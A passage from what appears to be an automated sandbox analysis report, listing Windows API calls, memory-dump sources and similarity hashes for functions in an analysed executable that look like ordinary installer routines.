• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: ErrorLast
• String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
• API String ID: 1452528299-1580325520
• Opcode ID: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
• Instruction ID: bfdb5615fdc952ab51c5d4d36cfcdc52ba3649a349ed7733e19bd606ff263fd4
• Opcode Fuzzy Hash: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
• Instruction Fuzzy Hash: A6117835A04204ABD731DE95C941A5E76DCDF46306F608077AD0596283D67C6F0A952A
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
• GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
• 73E9A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
• 73EA4620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
• 73EA4620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
• 73E9A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: A4620MetricsSystem$A480A570
• String ID:
• API String ID: 4120540252-0
• Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
• Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
• Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
• Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
• GetWindowLongA.USER32(?,000000F0), ref: 0041367F
• GetWindowLongA.USER32(?,000000F4), ref: 00413691
• SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
• SetPropA.USER32(?,00000000,00000000), ref: 004136BB
• SetPropA.USER32(?,00000000,00000000), ref: 004136D2
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: LongWindow$Prop
• String ID:
• API String ID: 3887896539-0
• Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
• Instruction ID: 955d73ee8c9e489f8eb805393a0cdbf9fe7b6d9765079e051d97cf620cdedb95
• Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
• Instruction Fuzzy Hash: D811C975500248BFDB00DF9DDC84EDA3BE8EB19364F144666B918DB2A1D738DD908BA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowLongA.USER32(?,000000EC), ref: 0047E272
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CFF1), ref: 0047E298
• GetWindowLongA.USER32(?,000000EC), ref: 0047E2A8
• SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E2C9
• ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E2DD
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E2F9
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: Window$Long$Show
• String ID:
• API String ID: 3609083571-0
• Opcode ID: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
• Instruction ID: 64a3e6c2176d4acc74ea6130292171d5cd043058eec335b926c35577e1896bc6
• Opcode Fuzzy Hash: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
• Instruction Fuzzy Hash: DE010CB5651210ABE600D769DE41F66379CAB0D334F0503AAB959DF2E3C729EC009B49
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
• UnrealizeObject.GDI32(00000000), ref: 0041B28C
• SelectObject.GDI32(?,00000000), ref: 0041B29E
• SetBkColor.GDI32(?,00000000), ref: 0041B2C1
• SetBkMode.GDI32(?,00000002), ref: 0041B2CC
• SetBkColor.GDI32(?,00000000), ref: 0041B2E7
• SetBkMode.GDI32(?,00000001), ref: 0041B2F2
  • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
• String ID:
• API String ID: 3527656728-0
• Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
• Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
• Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
• Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045585B,?,00000000,0045589B), ref: 004557A1
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455724
                                                                                                                                                                                                                                                                                                                                                                  • PendingFileRenameOperations2, xrefs: 00455770
                                                                                                                                                                                                                                                                                                                                                                  • WININIT.INI, xrefs: 004557D0
                                                                                                                                                                                                                                                                                                                                                                  • PendingFileRenameOperations, xrefs: 00455740
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-2199428270
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b0f03f73917aa0242672cad5e2a3d57b897b97096b21a66ee5a5e8eec82a5f33
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5ff55985f0d79b0cf99ef6a0ef0ae12f56fe6c83aec1de8438bfb9543cdeefde
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0f03f73917aa0242672cad5e2a3d57b897b97096b21a66ee5a5e8eec82a5f33
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB519670E006089FDB10FF61DC51AEEB7B9EF45305F50857BE804A7292DB7CAA49CA58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,00000000,00497991,?,?,00000000), ref: 00497762
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .dat$.msg$IMsg$Uninstall
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3312786188-1660910688
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9f64172403ddeb939d39a3f7df51289d5b6e9677db294260719396c464943470
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bbf2e7f3574d42a9113524bdb42c94a944b0e97273f2a70b882bd080beededf8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f64172403ddeb939d39a3f7df51289d5b6e9677db294260719396c464943470
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E318F74A10214AFDB00EF65DC82D6E7BB5EB89318B51847AF800AB392D739BD01CB58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAEA
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAF0
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB19
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 828529508-2866557904
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9534e904a59d8297daeb25b9d7825c0fbb6ed839ef6a9198d5c62e06eb12a6a6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f5c55ae169209784706469d1b6e96428d25835975ad7b3a5622eb1d8c2489c6d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9534e904a59d8297daeb25b9d7825c0fbb6ed839ef6a9198d5c62e06eb12a6a6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DF022E078062136E620E2BFACC3F6B498C8FA0725F040436F009EA2C2E92C9900422E
Uniqueness

Uniqueness Score: -1.00%

APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457E64
• GetExitCodeProcess.KERNEL32(?,00498116), ref: 00457E85
• CloseHandle.KERNEL32(?,00457EB8,?,?,004586D3,00000000,00000000), ref: 00457EAB
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: CloseCodeExitHandleMultipleObjectsProcessWait
• String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
• API String ID: 2573145106-3235461205
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE60
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFFB,00000000,0042E013,?,?,?,?,00000006,?,00000000,0049722D), ref: 0042DE7B
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE81
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: AddressDeleteHandleModuleProc
• String ID: RegDeleteKeyExA$advapi32.dll
• API String ID: 588496660-1846899949
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,00480D8E), ref: 0042EA45
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA4B
• InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA5C
  • Part of subcall function 0042E9BC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
  • Part of subcall function 0042E9BC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
  • Part of subcall function 0042E9BC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc
• String ID: ChangeWindowMessageFilterEx$user32.dll
• API String ID: 3478007392-2676053874
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
• InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3478007392-2498399450
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                                                                                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: AllowSetForegroundWindow$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1782028327-3855017861
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                                                                                                                                                                                                                                                                                                                  • SaveDC.GDI32(?), ref: 00416C93
                                                                                                                                                                                                                                                                                                                                                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                                                                                                                                                                                                                                                                                                                  • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                                                                                                                                                                                                                                                                                                                  • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3808407030-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
